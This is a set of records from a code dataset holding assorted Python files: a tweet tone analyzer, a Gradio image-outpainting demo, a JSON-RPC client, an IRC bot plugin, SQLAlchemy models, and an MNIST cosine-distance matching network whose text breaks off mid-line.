+{"seq_id":"576146116","text":"import json\nimport os\nfrom Twitter_Utils.TweetProcessing import TweetProcessor\nfrom Gnip_Client.IBMToneAnalysis import ToneAnalyzer\n\n\nclass DataTrimmer:\n def __init__(self):\n self.tweet_processor = TweetProcessor()\n self.tone_analyzer = ToneAnalyzer()\n\n @staticmethod\n def get_file_location(index):\n return os.getcwd() + '/Gnip_Client/Gnip_Searches/Gnip_Search_' + str(index) + '.json'\n\n def load_json_blob(self, counter):\n file_path = self.get_file_location(counter)\n with open(file_path) as data_file:\n return json.load(data_file)\n\n def get_tweets(self, s, r):\n tweet_set = set([])\n for i in range(s, r):\n try:\n print('At index ' + str(i))\n json_file = self.load_json_blob(i)\n for result in json_file['results']:\n tweet = self.tweet_processor.standardize_tweet(result['body'])\n emotions = self.tone_analyzer.query_ibm_for_tone(tweet)\n tweet_set.add(tweet)\n with open('output.csv', 'a+b') as analyzed_tweets:\n if emotions[0] and emotions[1] and emotions[2] and emotions[3] and emotions[4]:\n analyzed_tweets.write(tweet + ', ' + emotions[0] + ', ' + emotions[1] + ', '\n + emotions[2] + ', ' + emotions[3] + ', ' + emotions[4] + '\\n')\n return tweet_set\n\n except:\n print('Key \"body\" not found.')\n return None\n\n\nd = DataTrimmer()\nd.get_tweets(2,4)\n","sub_path":"Gnip_Client/GNIPDataTrimmer.py","file_name":"GNIPDataTrimmer.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"89122692","text":"#!/usr/bin/python3\nimport requests\nimport sys\n\nif __name__ == \"__main__\":\n url = sys.argv[1]\n email = {}\n email['email'] = sys.argv[2]\n\n r = requests.post(url, email)\n print(r.content.decode('utf-8'))\n","sub_path":"0x11-python-network_1/6-post_email.py","file_name":"6-post_email.py","file_ext":"py","file_size_in_byte":216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"627052726","text":"from pitch_utils import get_avg_pitch\nimport os\nfrom scipy import stats\nimport numpy as np\n\ninfiledir = \"data_highpitched_distr/train/woman\"\nnewdir = \"higher_pitched\"\npitches = []\nfor dirpath, dirnames, filenames in os.walk(infiledir):\n for filename in [f for f in filenames if f.endswith(\".wav\")]:\n filepath = os.path.join(dirpath, filename)\n pitches.append(get_avg_pitch(filepath))\n\n# remove values lower than 65Hz (that's about the lowest freq for male voice)\npitches = list(filter(lambda bigval: bigval >= 65, pitches))\n\ntot_avg_pitch = np.mean(pitches)\n\nprint(\"Average pitch for directory, \" + infiledir + \", is \" + str(tot_avg_pitch))\nprint(stats.describe(pitches))\n","sub_path":"get_dir_avg_pitch.py","file_name":"get_dir_avg_pitch.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"230472705","text":"import os\nimport gdown\nimport zipfile\nimport tensorflow\nfrom keras.models import Model, model_from_json\nfrom keras.layers import Activation, Dense, Input, \\\n Conv2DTranspose, Dense, Flatten\nfrom keras.optimizers import Adam\nimport numpy as np\nimport cv2\nimport gradio\n\ntry:\n from keras_contrib.layers.normalization import \\\n InstanceNormalization\nexcept Exception:\n from keras_contrib.layers.normalization.instancenormalization\\\n import \\\n InstanceNormalization\n\nCHECKPOINT_PATH = 'checkpoint/'\nCHECKPOINT_LINK = 'https://drive.google.com/u/0/uc?' \\\n 'export=download&confirm=a7YF&id=' \\\n '1MfXsRwjx5CTRGBoLx154S0h-Q3rIUNH0'\n\nINPUT_SHAPE = (256, 256, 3)\n# 25% i.e 64 width size will be mask from both side\nMASK_PERCENTAGE = .25\n\ng_input_shape = (INPUT_SHAPE[0], int(INPUT_SHAPE[1] * (MASK_PERCENTAGE * 2)),\n INPUT_SHAPE[2])\n\n\nEPSILON = 1e-9\nALPHA = 0.0004\n\ndef dcrm_loss(y_true, y_pred):\n return -tensorflow.reduce_mean(tensorflow.log(tensorflow.maximum(y_true, EPSILON)) +\n tensorflow.log(tensorflow.maximum(1. - y_pred, EPSILON)))\n\nd_input_shape = (INPUT_SHAPE[0], int(INPUT_SHAPE[1] * (MASK_PERCENTAGE *2)), INPUT_SHAPE[2])\nd_dropout = 0.25\nDCRM_OPTIMIZER = Adam(0.0001, 0.5)\n\nGEN_OPTIMIZER = Adam(0.001, 0.5)\n\ndef load_model():\n # Checking if all the model exists\n model_names = ['DCRM', 'GEN']\n files = os.listdir(CHECKPOINT_PATH)\n for model_name in model_names:\n if model_name + \".json\" not in files or \\\n model_name + \".hdf5\" not in files:\n print(\"Models not Found\")\n return\n # global DCRM, GEN, COMBINED, IMAGE, GENERATED_IMAGE, CONF_GENERATED_IMAGE\n\n # load DCRM Model\n model_path = CHECKPOINT_PATH + \"%s.json\" % 'DCRM'\n weight_path = CHECKPOINT_PATH + \"%s.hdf5\" % 'DCRM'\n with open(model_path, 'r') as f:\n DCRM = model_from_json(f.read())\n DCRM.load_weights(weight_path)\n DCRM.compile(loss=dcrm_loss, optimizer=DCRM_OPTIMIZER)\n\n # load GEN Model\n model_path = CHECKPOINT_PATH + \"%s.json\" % 'GEN'\n weight_path = CHECKPOINT_PATH + \"%s.hdf5\" % 'GEN'\n with open(model_path, 'r') as f:\n GEN = model_from_json(f.read(), custom_objects={\n 'InstanceNormalization': InstanceNormalization()})\n GEN.load_weights(weight_path)\n\n # Combined Model\n DCRM.trainable = False\n IMAGE = Input(shape=g_input_shape)\n GENERATED_IMAGE = GEN(IMAGE)\n CONF_GENERATED_IMAGE = DCRM(GENERATED_IMAGE)\n\n COMBINED = Model(IMAGE, [CONF_GENERATED_IMAGE, GENERATED_IMAGE])\n COMBINED.compile(loss=['mse', 'mse'], optimizer=GEN_OPTIMIZER)\n\n print(\"loaded model\")\n return GEN\n\n\ndef get_demask_images(original_images, generated_images):\n demask_images = []\n for o_image, g_image in zip(original_images, generated_images):\n print(g_image.shape)\n width = g_image.shape[1] // 2\n x_image = g_image[:, :width]\n y_image = g_image[:, width:]\n o_image = np.concatenate((x_image,o_image, y_image), axis=1)\n demask_images.append(o_image)\n return np.asarray(demask_images)\n\ndef mask_width(img):\n image = img.copy()\n height = image.shape[0]\n width = image.shape[1]\n new_width = int(width * MASK_PERCENTAGE)\n mask = np.ones([height, new_width, 3])\n missing_x = img[:, :new_width]\n missing_y = img[:, width - new_width:]\n missing_part = np.concatenate((missing_x, missing_y), axis=1)\n image = image[:, :width - new_width]\n image = image[:, new_width:]\n return image, missing_part\n\n\ndef get_masked_images(images):\n mask_images = []\n missing_images = []\n for image in images:\n mask_image, missing_image = mask_width(image)\n mask_images.append(mask_image)\n missing_images.append(missing_image)\n return np.array(mask_images), np.array(missing_images)\n\n\ndef recursive_paint(GEN, image, factor=3):\n final_image = None\n gen_missing = None\n for i in range(factor):\n demask_image = None\n if i == 0:\n x, y = get_masked_images([image])\n gen_missing = GEN.predict(x)\n final_image = get_demask_images(x, gen_missing)[0]\n else:\n gen_missing = GEN.predict(gen_missing)\n final_image = get_demask_images([final_image], gen_missing)[0]\n return final_image\n\n\ndef load():\n if not os.path.exists(CHECKPOINT_PATH):\n os.makedirs(CHECKPOINT_PATH)\n gdown.download(CHECKPOINT_LINK, CHECKPOINT_PATH + 'checkpoint_24.zip')\n with zipfile.ZipFile(CHECKPOINT_PATH + 'checkpoint_24.zip', 'r') as \\\n zip_ref:\n zip_ref.extractall('./')\n GEN = load_model()\n graph = tensorflow.get_default_graph()\n return GEN, graph\n\nGEN, graph = load()\n\ndef predict(image, model):\n image = Image.fromarray(image.astype('uint8'), 'RGB')\n GEN, graph = model\n image = image.convert('RGB')\n image = np.array(image)\n image = cv2.resize(image, (256, 256))\n cropped_image = image[:, 65:193]\n input_image = image / 127.5 - 1\n # input_image = np.expand_dims(input_image, axis=0)\n with graph.as_default():\n # predicted_image = GEN.predict(input_image)\n predicted_image = recursive_paint(GEN, input_image)\n # predicted_image = get_demask_images(input_image, predicted_image)[0]\n predicted_image = (predicted_image + 1) * 127.5\n predicted_image = predicted_image.astype(np.uint8)\n\n # image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n # predicted_image = cv2.cvtColor(predicted_image, cv2.COLOR_BGR2RGB)\n return predicted_image\n\n\nINPUTS = gradio.inputs.ImageIn()\nOUTPUTS = gradio.outputs.Image()\nINTERFACE = gradio.Interface(fn=predict, inputs=INPUTS, \n outputs=OUTPUTS,\n title='Image Outpainting', \n description='Restore missing parts of an image!', \n thumbnail='https://camo.githubusercontent.com/1374c4a783e9a1b3f31cda08e84fd1c39ebb618d/687474703a2f2f692e696d6775722e636f6d2f704455707a63592e6a7067')\n\nINTERFACE.launch(inbrowser=True)\n\n","sub_path":"run-gradio.py","file_name":"run-gradio.py","file_ext":"py","file_size_in_byte":6115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"285746667","text":"#!/usr/bin/python3\n# Python 3 json rpc client module, with cookie support\n\nimport os.path\nimport urllib.request\nfrom http.cookiejar import LWPCookieJar\nimport json, types\n\n# this cookie jar will work with lib-www too\ncookiejar = LWPCookieJar( '/tmp/session_cookie.lwp' )\n\ncookie = urllib.request.HTTPCookieProcessor( cookiejar )\nopener = urllib.request.build_opener(cookie)\nurllib.request.install_opener(opener)\n\ntype_map = {\n 'string': str,\n 'number': float,\n 'boolean' : bool,\n 'object': dict,\n 'array': list\n}\n\nclass JsonRPC:\n def __init__( self, url ):\n if os.path.isfile( cookiejar.filename ):\n cookiejar.load()\n\n self._method = {}\n self._seq_id = 0\n self._base_url = url\n\n self._load_services()\n self._cookiejar = cookiejar\n\n def __del__( self ):\n self._cookiejar.save()\n\n def _load_services( self ):\n r = urllib.request.urlopen( self._base_url + '/service.smd' ).read().decode( 'utf8' )\n\n d = json.loads( r )\n\n for name in d[ 'services' ]:\n m = d[ 'services' ][ name ]\n\n self._method[ name ] = d[ 'services' ][ name ]\n\n def __getattr__( self, method_name ):\n mdata = self._method[ method_name ]\n\n def jsonrpc_call( *args ):\n idx = 0\n self._seq_id += 1\n seq_id = self._seq_id\n\n # We need argument checking here !\n params = []\n for a in args:\n if 'parameters' in mdata:\n p = mdata['parameters'][ idx ]\n\n if p[ 'type' ] in type_map:\n if type_map[ p[ 'type' ] ] != type( a ):\n raise Exception( \"bad param type: %s = %s for method %s \" % (p['type'], type( a ), method_name))\n else:\n raise Exception( 'unknown definition type \\'%s\\' as it should have been a \\'%s\\' in method : %s ' % (type( a ), p[ 'type' ], method_name) )\n\n idx += 1\n params.append( a )\n\n payload = {\n 'method' : method_name,\n 'params' : params,\n 'jsonrpc': \"2.0\",\n 'id' : seq_id\n }\n\n req = urllib.request.Request( self._base_url, data=json.dumps( payload ).encode())\n req.add_header('Content-Type', 'application/json')\n r = json.loads( urllib.request.urlopen(req).read().decode( 'utf8̈́' ))\n\n if r[ 'id' ] == seq_id:\n if 'result' in r:\n return r[ 'result' ]\n elif 'error' in r:\n raise Exception( 'Error \"%s\" in method %s' % (r[ 'error' ][ 'message' ], method_name) )\n else:\n raise Exception( 'Unknown error in method %s' % method_name )\n\n raise Exception( 'bad PRC responce for method %s' % method_name )\n\n return jsonrpc_call\n\nif __name__ == '__main__':\n r = JsonRPC( 'http://localhost:8080/json' )\n r.domain_open( 'essens' )\n print( r.status('kat') )\n","sub_path":"py_print/json_client.py","file_name":"json_client.py","file_ext":"py","file_size_in_byte":3063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"170520447","text":"import itertools\nimport random\nfrom urllib.parse import urlencode\n\nimport requests\nfrom irc3.plugins.command import command\nimport irc3\nimport ircmessage\nfrom lxml import html\nimport re\n\nfrom .redflare_client import RedflareClient\n\n\n@irc3.plugin\nclass RELBotPlugin:\n def __init__(self, bot):\n self.bot = bot\n self.redflare_url = self.bot.config.get(\"relbot\", dict()).get(\"redflare_url\", None)\n\n @command(permission=\"view\")\n def matches(self, mask, target, args):\n \"\"\"List interesting Red Eclipse matches\n\n %%matches\n \"\"\"\n\n if not self.redflare_url:\n yield \"Redflare URL not configured\"\n return\n\n rfc = RedflareClient(self.redflare_url)\n servers = rfc.servers()\n\n # i: Server\n non_empty_legacy_servers = [s for s in servers if s.players_count > 0 and not s.version.startswith(\"2.\")]\n\n if not non_empty_legacy_servers:\n yield \"No legacy matches running at the moment.\"\n return\n\n for server in sorted(non_empty_legacy_servers, key=lambda s: s.players_count, reverse=True):\n players = [p.name for p in server.players]\n\n # the colors we use to format player names\n colors = [\"red\", \"pink\", \"green\", \"teal\", \"orange\", None]\n # make things a bit more interesting by randomizing the order\n random.shuffle(colors)\n # however, once the order is defined, just apply those colors in the ever same order to nicks in the list\n # it'd be nice to assign some sort of \"persistent\" colors derived from the nicks\n colors = itertools.cycle(colors)\n\n # this is the \"freem exception\"\n # freem doesnt like to be pinged on IRC whenever !matches is called while they are playing\n # the easiest way to fix this is to just change the name in the listing\n # ofc this only works until freem decides to use another nickname\n players = [\"_freem_\" if p == \"freem\" else p for p in players]\n\n message = \"%s on %s (%s): %s %s on %s\" % (\n ircmessage.style(str(server.players_count), fg=\"red\"),\n ircmessage.style(\"%s\" % server.description, fg=\"orange\"),\n \", \".join((ircmessage.style(p, fg=next(colors)) for p in players)),\n ircmessage.style(\"-\".join(server.mutators), fg=\"teal\"),\n ircmessage.style(server.game_mode, fg=\"green\"),\n ircmessage.style(server.map_name, fg=\"pink\"),\n )\n\n print(repr(message))\n\n yield message\n\n @command(permission=\"view\")\n def rivalry(self, mask, target, args):\n \"\"\"Show player counts on legacy and 2.x servers\n\n %%rivalry\n \"\"\"\n\n if not self.redflare_url:\n yield \"Redflare URL not configured\"\n return\n\n rfc = RedflareClient(self.redflare_url)\n servers = rfc.servers()\n\n # i: Server\n non_legacy_servers = [s for s in servers if s.version.startswith(\"2.\")]\n legacy_servers = [s for s in servers if not s in non_legacy_servers]\n\n non_legacy_players_count = sum([s.players_count for s in non_legacy_servers])\n legacy_players_count = sum([s.players_count for s in legacy_servers])\n\n message = \"%d legacy vs. %d non-legacy players\" % (legacy_players_count, non_legacy_players_count)\n\n if non_legacy_players_count == 0:\n if legacy_players_count == 0:\n ratio = None\n else:\n # with no matches running, legacy wins\n # over 9000!\n ratio = 9001\n else:\n ratio = float(legacy_players_count) / float(non_legacy_players_count)\n\n if ratio is None:\n message += \" -- no matches running o_O\"\n elif ratio > 2:\n message += \" -- WOOHOO!!!111!1!!11\"\n elif ratio > 1:\n message += \" -- awesome!\"\n elif ratio == 1:\n message += \"... meh...\"\n else:\n message += \"... urgh...\"\n\n yield message\n\n @command(name=\"reload-plugin\", permission=\"view\")\n def reload_plugin(self, mask, target, args):\n \"\"\"Reloads this plugin\n\n %%reload-plugin\n \"\"\"\n\n self.bot.reload(\"relbot.chat_plugin\")\n\n yield \"Done!\"\n\n @command(name=\"rp\", permission=\"view\")\n def rp(self, *args, **kwargs):\n \"\"\"Reloads this plugin\n\n %%rp\n \"\"\"\n return self.reload_plugin(*args, **kwargs)\n\n @command(name=\"lmgtfy\", permission=\"view\")\n def lmgtfy(self, mask, target, args):\n \"\"\"Let me google that for you!\n\n %%lmgtfy ...\n \"\"\"\n\n querystring = urlencode({\n \"q\": \" \".join(args[\"\"]),\n })\n\n yield \"https://lmgtfy.com/?{}\".format(querystring)\n\n @command(name=\"chuck\", permission=\"view\")\n def chuck(self, mask, target, args):\n \"\"\"Tell a Chuck Norris joke from the Internet Chuck Norris Database (icndb.com)\n\n %%chuck\n \"\"\"\n\n proxies = {\n \"http\": \"socks5://127.0.0.1:9050\",\n \"https\": \"socks5://127.0.0.1:9050\",\n }\n\n url = \"http://api.icndb.com/jokes/random\"\n\n response = requests.get(url, allow_redirects=True, proxies=proxies)\n\n yield response.json()[\"value\"][\"joke\"]\n\n @irc3.event(irc3.rfc.PRIVMSG)\n def github_integration(self, mask, target, data, **kwargs):\n \"\"\"Check every message if it contains GitHub references (i.e., some #xyz number), and provide a link to GitHub\n if possible.\n Uses web scraping instead of any annoying\n Note: cannot use yield to send replies; it'll fail silently then\n \"\"\"\n\n # skip all commands\n if any((data.strip(\" \\r\\n\").startswith(i) for i in [self.bot.config[\"cmd\"], self.bot.config[\"re_cmd\"]])):\n return\n\n # some things can't be done easily by a regex\n # we have to intentionally terminate the data with a space\n # that way, we can check that the #123 like patters stand alone using a regex that makes sure there's at least\n # a whitespace character after the interesting bit, ensuring that strings like #123abc are not matched\n # this should prevent some false and unnecessary checks\n data += \" \"\n\n matches = re.findall(r\"#([0-9]+)\\s+\", data)\n\n print(matches)\n\n for match in matches:\n # we just check the issues URL; GitHub should automatically redirect to pull requests\n url = \"https://github.com/blue-nebula/base/issues/{}\".format(match)\n\n proxies = {\n \"http\": \"socks5://127.0.0.1:9050\",\n \"https\": \"socks5://127.0.0.1:9050\",\n }\n\n response = requests.get(url, allow_redirects=True, proxies=proxies)\n\n if response.status_code != 200:\n if response.status_code == 404:\n self.bot.notice(target, \"[GitHub] Could not find anything for #{}\".format(match))\n\n else:\n self.bot.notice(target, \"[GitHub] Request to GitHub failed\")\n\n return\n\n tree = html.fromstring(response.content)\n title = tree.cssselect(\".gh-header-title .js-issue-title\")[0].text.strip(\" \\r\\n\")\n\n url_parts = response.url.split(\"/\")\n if \"pull\" in url_parts:\n type = \"PR\"\n elif \"issues\" in url_parts:\n type = \"Issue\"\n else:\n type = \"Unknown Entity\"\n\n notice = \"[GitHub] {} #{}: {} ({})\".format(type, match, title, response.url)\n\n self.bot.notice(target, notice)\n\n @classmethod\n def reload(cls, old):\n return cls(old.bot)\n","sub_path":"relbot/chat_plugin.py","file_name":"chat_plugin.py","file_ext":"py","file_size_in_byte":7760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"310180227","text":"import os, sys\nfrom pandac.PandaModules import ConfigVariableBool\nfrom pandac.PandaModules import ConfigVariableInt\n\nfrom direct.showbase.ShowBase import ShowBase\nfrom panda3d.core import *\n\nif 0:\n wp = WindowProperties()\n #wp.setFullscreen(1)\n #wp.setSize(1024, 768)\n\nif 0:\n\n base.openMainWindow()\n base.win.requestProperties(wp)\n base.graphicsEngine.openWindows()\n \nif 1:\n class MyApp(ShowBase):\n def __init__(self):\n ShowBase.__init__(self)\n self.accept(\"escape\",sys.exit)\n self.setBackgroundColor(0,0,0)\n\n if 0:\n wp = WindowProperties()\n wp.setFullscreen(1)\n wp.setSize(1920, 1080)\n \n self.openMainWindow()\n self.win.requestProperties(wp)\n self.graphicsEngine.openWindows()\n\n self.wp1 = WindowProperties()\n self.wp1.setSize(800, 600)\n self.wp1.setOrigin(100, 100)\n self.win1 = base.openWindow(props=self.wp1, aspectRatio=1)\n \n self.wp2 = WindowProperties()\n self.wp2.setSize(800, 600)\n self.wp2.setOrigin(900, 100)\n self.win2 = base.openWindow(props=self.wp2, aspectRatio=1)\n\n self.disableMouse()\n\n if 0:\n text = TextNode('node name')\n text.setText(\"Every day in every way I'm getting better and better.\")\n textNodePath = aspect2d.attachNewNode(text)\n cmr12 = loader.loadFont('cmr12.egg')\n text.setAlign(TextNode.ACenter)\n\n text.setFont(cmr12)\n textNodePath.setScale(0.1)\n\n app = MyApp()\n app.run()\n\n","sub_path":"pandastest/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"177372488","text":"# -*- coding: utf-8 -*-\n\nfrom sqlalchemy import Column\nfrom sqlalchemy import String, Integer, DateTime\nfrom sqlalchemy.orm import declarative_base\n\nBase = declarative_base()\n\n\nclass Wallet(Base):\n __tablename__ = \"wallet\"\n\n idx = Column(\n Integer,\n unique=True,\n primary_key=True,\n nullable=False\n )\n\n owner = Column(\n String(50),\n nullable=False\n )\n\n name = Column(\n String(30),\n nullable=False\n )\n\n count = Column(\n Integer,\n nullable=False,\n default=0\n )\n\n def __repr__(self):\n return f\"\"\n\n\nclass Coin(Base):\n __tablename__ = \"coin\"\n\n name = Column(\n String(30),\n unique=True,\n primary_key=True,\n nullable=False\n )\n\n price = Column(\n Integer,\n nullable=False\n )\n\n def __repr__(self):\n return f\"\"\n\n\nclass Point(Base):\n __tablename__ = \"point\"\n\n owner = Column(\n String(50),\n unique=True,\n primary_key=True,\n nullable=False\n )\n\n point = Column(\n Integer,\n nullable=False\n )\n\n def __repr__(self):\n return f\"\"\n\n\nclass Gift(Base):\n __tablename__ = \"gift\"\n\n idx = Column(\n Integer,\n unique=True,\n primary_key=True,\n nullable=False\n )\n\n owner = Column(\n String(50),\n nullable=False\n )\n\n type = Column(\n String(30),\n nullable=False\n )\n\n date = Column(\n DateTime,\n nullable=False\n )\n\n def __repr__(self):\n return f\"\"\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"566478759","text":"# Using Cosine Distance to train a matching network\n\nimport tensorflow as tf\nimport numpy as np\nimport getopt\nimport random\nimport math\nimport sys\nimport os\n\nfrom tensorflow.examples.tutorials.mnist import input_data\nmnist = input_data.read_data_sets(\"../../../testing-data/MNIST_data/\",\n one_hot=True)\n\ndef help_message():\n exit(1)\n\nos.environ[\"CUDA_DEVICE_ORDER\"]=\"PCI_BUS_ID\" \nos.environ[\"CUDA_VISIBLE_DEVICES\"]=\"1\"\n\n# Graph Constants\nsize = [28, 28, 1]\nnKernels = [64, 64,64]\nfully_connected_nodes = 128\npoolS = 2\n\n# Training information\nnIt = 5000\ncheck = 1000\nbatchS = 32\nlearning_rate = 1e-4\ntensorboard = False\ndropout = False\nbatch_norm = False\n\n# Support and testing infromation\nclassList = [1,2,3,4,5,6,7,8,9,0]\nnumbers = []\nnumbersTest = []\nnClasses = 3\nnImgsSuppClass = 5\n\nbase = \"/tmp/mnist-cosine-\"\n\nopts, args = getopt.getopt(sys.argv[1:], \"hmnodL:c:i:b:s:\", [\"help\", \n \"num_classes=\", \"num_supports=\", \"base_path=\", \"num_iterations=\",\n \"dropout\", \"batch_norm\", \"num_layers=\"])\n\nfor o, a in opts:\n if o in (\"-c\", \"--num_classes\"):\n nClasses = int(a)\n elif o in (\"-s\", \"--num_supports\"):\n nImgsSuppClass = int(a)\n elif o in (\"-b\", \"--base_path\"):\n base = a\n if a[-1] != \"/\":\n base += \"/\"\n base += \"mnist-cosine-\"\n elif o in (\"-i\", \"--num_iterations\"):\n nIt = int(a)\n elif o in (\"-d\", \"--data\"):\n train_file_path = \"../../../testing-data/omniglot-rotate/\"\n elif o in (\"-m\", \"--meta_tensorboard\"):\n tensorboard = True\n elif o in (\"-o\", \"--dropout\"):\n dropout = True\n elif o in (\"-n\", \"--batch_norm\"):\n batch_norm = True\n elif o in (\"-L\", \"--num_layers\"):\n nKernels = [64 for x in range(int(a))]\n elif o in (\"-h\", \"--help\"):\n help_message()\n else:\n print(\"unhandled option: \"+o)\n help_message()\n\nnumbers = classList[:nClasses]\nnumbersTest = classList[10-nClasses:]\n\nSAVE_PATH = base\nif batch_norm:\n SAVE_PATH += \"norm-\"\nif dropout:\n SAVE_PATH += \"dropout-\"\n\nSAVE_PATH += str(len(nKernels)) + \"-\" + str(nClasses) + \"-\" + str(nImgsSuppClass)\n\nLOG_DIR = \"./mnist_network_training/cosine/\"\nif batch_norm:\n LOG_DIR += \"norm/\"\nif dropout:\n LOG_DIR += \"dropout/\"\nLOG_DIR += str(len(nKernels)) + \"/\" + str(nClasses) + \"/\" + str(nImgsSuppClass) \n\n# Collecting sample both for query and for testing\ndef get_samples(mnistNum, nSupportImgs, testing = False):\n one_hot_list = [0.] * 10\n one_hot_list[mnistNum] = 1.\n samples = 0\n if not testing:\n imageNum = random.randint(0, mnist.train.images.shape[0] - 1)\n else:\n imageNum = random.randint(0, mnist.test.images.shape[0] - 1)\n pickedImages = []\n pickedLabels = []\n while samples < nSupportImgs:\n if (imageNum == len(mnist.train.images) and not testing):\n imageNum = 0\n elif (imageNum == len(mnist.test.images) and testing):\n imageNum = 0\n if not testing:\n labelThis = mnist.train.labels[imageNum, :]\n else:\n labelThis = mnist.test.labels[imageNum, :]\n if np.all(labelThis == one_hot_list):\n if not testing:\n imgReshape = np.reshape(mnist.train.images[imageNum,:], size)\n pickedLabels.append(mnist.train.labels[imageNum, :])\n else:\n imgReshape = np.reshape(mnist.test.images[imageNum,:], size)\n pickedLabels.append(mnist.test.labels[imageNum, :])\n pickedImages.append(imgReshape)\n samples += 1\n imageNum += 1\n return pickedImages, pickedLabels\n\n# Get several images\ndef get_support(test=False):\n supportImgs = []\n \n choices = numbers\n \n for support in choices:\n newSupportImgs, newSupportLabels = get_samples(support, nImgsSuppClass,\n test)\n supportImgs.append(newSupportImgs)\n \n return supportImgs\n\n# Get a single query value\ndef get_query(test=False):\n\n choices = numbers\n\n imageInd = random.randint(0, len(choices) - 1)\n imageNum = choices[imageInd]\n img, label = get_samples(imageNum, 1, test)\n l=np.zeros(len(choices))\n l[imageInd]=1\t\t\n return img[0], l\n\ntf.reset_default_graph()\n\n# Support information - matrix\n# Dimensions: batch size, n classes, n supp imgs / class\ns_imgs = tf.placeholder(tf.float32, [batchS, nClasses, nImgsSuppClass]+size)\n\n# Query Information - vector\nq_img = tf.placeholder(tf.float32, [batchS]+size) # batch size, size\n# batch size, number of categories\nq_label = tf.placeholder(tf.int32, [batchS, len(numbers)])\n\n# Network Function\n# Call for each support image (row of the support matrix) and for the query \n# image.\n\ndef create_network(img, size, First = False):\n currInp = img\n layer = 0\n currFilt = size[2]\n \n with tf.name_scope(\"run_network\"):\n for k in nKernels:\n with tf.variable_scope('conv'+str(layer), \n reuse=tf.AUTO_REUSE) as varscope:\n layer += 1\n weight = tf.get_variable('weight', [3,3,currFilt,k])\n currFilt = k\n if batch_norm:\n convR = tf.nn.conv2d(currInp, weight, strides=[1,1,1,1], padding=\"SAME\")\n beta = tf.get_variable('beta', [k], initializer = tf.constant_initializer(0.0))\n gamma = tf.get_variable('gamma', [k], initializer=tf.constant_initializer(1.0))\n mean, variance = tf.nn.moments(convR, [0,1,2])\n PostNormalized = tf.nn.batch_normalization(convR,mean,variance,beta,gamma,1e-10)\n reluR = tf.nn.relu(PostNormalized)\n else:\n bias = tf.get_variable('bias', [k], initializer = \n tf.constant_initializer(0.0))\n convR = tf.nn.conv2d(currInp, weight, strides=[1,1,1,1], padding=\"SAME\")\n convR = tf.add(convR, bias)\n reluR = tf.nn.relu(convR)\n poolR = tf.nn.max_pool(reluR, ksize=[1,poolS,poolS,1], \n strides=[1,poolS,poolS,1], padding=\"SAME\")\n currInp = poolR\n\n if dropout:\n currInp = tf.nn.dropout(currInp,0.8); \n return currInp\n\n# Call the network created above on the qury\nquery_features = create_network(q_img, size, First = True)\n\nsupport_list = []\nquery_list = []\n\n# Go through each class and each support image in that class\nfor k in range(nClasses):\n slist=[]\n qlist=[]\n for i in range(nImgsSuppClass):\n slist.append(create_network(s_imgs[:, k, i, :, :, :], size))\n qlist.append(query_features)\n slist = tf.stack(slist)\n qlist = tf.stack(qlist) \n support_list.append(slist)\n query_list.append(qlist)\n\n# Make a stack to compare the query to every support\nquery_repeat = tf.stack(query_list)\nsupports = tf.stack(support_list)\n\n# Loss\n# Cosine distance calculation \n# Application of softmax \n# Minimize loss\n\nwith tf.name_scope(\"loss\"):\n dotProduct = tf.reduce_sum(tf.multiply(query_repeat, supports), [3,4,5])\n supportsMagn = tf.sqrt(tf.reduce_sum(tf.square(supports), [3,4,5]))\n cosDist = dotProduct / tf.clip_by_value(supportsMagn, 1e-10, float(\"inf\"))\n \n cosDist = tf.transpose(cosDist,[2,0,1])\n\n # Find the average cosine distance per class\n MeanCosDist= tf.reduce_mean(cosDist,2)\n # fnd the maximum cosine distance per class\n MaxCostDist = tf.reduce_max(cosDist,2)\n\n loss = tf.reduce_sum(tf.nn.softmax_cross_entropy_with_logits_v2(\n logits = MeanCosDist, labels = q_label))\n\n# Optimizer\nwith tf.name_scope(\"optimizer\"):\n optimizer = tf.train.AdamOptimizer(learning_rate).minimize(loss)\n\n# Accuracy and Equality Distribution\n\nwith tf.name_scope(\"accuracy\"):\n # Find the closest class\n max_class = tf.argmax(MaxCostDist, 1)\n # Find whihc class was supposed to be the closest\n max_label = tf.argmax(q_label, 1) \n \n # Compare the values\n total = tf.equal(max_class, max_label) \n # Find on average, how many were correct\n accuracy = tf.reduce_mean(tf.cast(total, tf.float32))\n\ndef get_next_batch(test = False):\n suppImgs = []\n suppLabels = []\n # Get support values for each batch \n for j in range(batchS):\n suppImgsOne = get_support(test)\n suppImgs.append(suppImgsOne)\n suppImgs = np.asarray(suppImgs)\n # Get query value for each batch\n queryImgBatch = []\n queryLabelBatch = []\n for i in range(batchS):\n qImg, qLabel = get_query(test)\n queryImgBatch.append(qImg)\n queryLabelBatch.append(qLabel)\n queryLabelBatch = np.asarray(queryLabelBatch)\n queryImgBatch = np.asarray(queryImgBatch)\n\n return suppImgs, suppLabels, queryImgBatch, queryLabelBatch\n\n# Session\n\n# Initialize the variables we start with\ninit = tf.global_variables_initializer()\n\nwith tf.Session() as session:\n session.run(init)\n \n # Create a save location\n Saver = tf.train.Saver()\n\n step = 1\n while step < nIt:\n step = step + 1\n\n suppImgs, suppLabels, queryImgBatch, queryLabelBatch = get_next_batch()\n \n # Run the session with the optimizer\n if tensorboard and step == 2:\n writer = tf.summary.FileWriter(LOG_DIR + \"/\" + str(step), session.graph)\n runOptions = tf.RunOptions(trace_level = tf.RunOptions.FULL_TRACE)\n run_metadata = tf.RunMetadata()\n ACC, LOSS, OPT = session.run([accuracy, loss, optimizer], feed_dict\n 